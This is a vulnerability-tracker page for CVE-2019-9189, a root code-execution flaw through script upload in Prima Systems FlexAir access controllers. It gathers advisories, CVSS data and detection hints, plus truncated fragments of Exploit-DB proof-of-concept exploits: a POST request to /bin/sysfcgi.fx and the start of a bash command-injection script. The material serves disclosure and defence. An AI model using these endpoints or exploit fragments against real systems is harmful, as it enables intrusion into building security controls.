CVE-2019-9189
published 2019-06-05CVE-2019-9189: Prima Systems FlexAir, Versions 2.4.9api3 and prior. The application allows the upload of arbitrary Python scripts when configuring the main central…
PriorityP271high8.8CVSS 3.0
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
11.63%
95.5th percentile
Prima Systems FlexAir, Versions 2.4.9api3 and prior. The application allows the upload of arbitrary Python scripts when configuring the main central controller. These scripts can be immediately executed because of root code execution, not as a web server user, allowing an authenticated attacker to gain full system access.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| primasystems | flexair | <= 2.3.38 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor for HTTP POST requests to /bin/sysfcgi.fx, which is the vulnerable endpoint used to inject commands and upload arbitrary files on Prima/FlexAir devices. ↗
- →Alert on HTTP GET requests retrieving files from /app/images/logos/ — attackers write command output or uploaded payloads to this web-accessible directory for exfiltration. ↗
- →Detect execution context of web-initiated processes running as root (uid=0); the exploit confirms code runs as root, not as the web server user. ↗
- →Flag uploads of Python scripts via the web interface to the central controller configuration, as the application executes them immediately with root privileges. ↗
- ·Exploitation requires authentication; the attacker must have valid credentials before abusing the file upload/command injection functionality. ↗
- ·The vulnerability affects Prima Systems FlexAir versions 2.4.9api3 and prior, as well as Prima Access Control 2.3.35; scope detection rules to these product versions. ↗
- ·The device runs on an ARM (armv7l) Linux platform; host-based detection rules should account for this architecture. ↗
CVSS provenance
nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-36c5-5h9q-3jvp: On Prima Systems FlexAir devices through 2
ghsa_unreviewed·2022-05-24
CVE-2019-9189 [HIGH] GHSA-36c5-5h9q-3jvp: On Prima Systems FlexAir devices through 2
On Prima Systems FlexAir devices through 2.4.9api3, an authenticated user can upload Python (.py) scripts and execute arbitrary code with root privileges.
CISA ICS
Prima Systems FlexAir
cisa_ics·2019-07-30·CVSS 7.2
[HIGH] Prima Systems FlexAir
## Archived Content In an effort to keep CISA.gov current, the archive contains outdated information that may not reflect current policy or programs.
ICS Advisory
##
Prima Systems FlexAir
Last RevisedJuly 30, 2019
Alert CodeICSA-19-211-02
## 1. EXECUTIVE SUMMARY
- CVSS v3 10.0
- ATTENTION: Exploitable remotely/low skill level to exploit
- Vendor: Prima Systems
- Equipment: FlexAir
- Vulnerabilities: OS Command Injection, Unrestricted Upload of File with Dangerous Type, Cross-site Request Forgery, Small Space of Random Values, Cross-site Scripting, Exposure of Backup file to Unauthorized Control Sphere, Improper Authentication, Use of Hard-coded Credentials
## 2. RISK EVALUATION
Exploitation of these vulnerabilities may allow an attacke
No detection rules found.
Exploit-DB
Prima Access Control 2.3.35 - Arbitrary File Upload
exploitdb·2019-11-12·CVSS 8.8
CVE-2019-9189 [HIGH] Prima Access Control 2.3.35 - Arbitrary File Upload
Prima Access Control 2.3.35 - Arbitrary File Upload
---
# Exploit Title: Prima Access Control 2.3.35 - Arbitrary File Upload
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 2.3.35
# Tested on: NA
# CVE : CVE-2019-9189
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Prima Access Control 2.3.35 Authenticated Stored XSS
# PoC
---
POST /bin/sysfcgi.fx HTTP/1.1
Host: 192.168.13.37
Connection: keep-alive
Content-Length: 572
Origin: https://192.168.13.37
Session-ID: 5682699
User-Agent: Mozi-Mozi/44.0
Content-Type: application/x-w
Exploit-DB
FlexAir Access Control 2.4.9api3 - Remote Code Execution
exploitdb·2019-11-12·CVSS 8.8
CVE-2019-9189 [HIGH] FlexAir Access Control 2.4.9api3 - Remote Code Execution
FlexAir Access Control 2.4.9api3 - Remote Code Execution
---
# Exploit Title: FlexAir Access Control 2.4.9api3 - Remote Code Execution
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 2.4.9api3
# Tested on: NA
# CVE : CVE-2019-9189
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# PoC
#!/bin/bash
#
# Command injection with root privileges in FlexAir Access Control (Prima Systems)
# Firmware version: ${OUTPUT_FILE}"
# Command injection payload. Be careful with single quotes!
PAYLOAD=""
# Perform exploit
echo "Executing: ${CMD}
No writeups or analysis indexed.
http://packetstormsecurity.com/files/155273/Prima-Access-Control-2.3.35-Script-Upload-Remote-Code-Execution.htmlhttps://applied-risk.com/index.php/download_file/view/199/165https://applied-risk.com/labs/advisorieshttps://applied-risk.com/resources/ar-2019-007https://www.us-cert.gov/ics/advisories/icsa-19-211-02http://packetstormsecurity.com/files/155273/Prima-Access-Control-2.3.35-Script-Upload-Remote-Code-Execution.htmlhttps://applied-risk.com/index.php/download_file/view/199/165https://applied-risk.com/labs/advisorieshttps://applied-risk.com/resources/ar-2019-007https://www.us-cert.gov/ics/advisories/icsa-19-211-02
2019-06-05
Published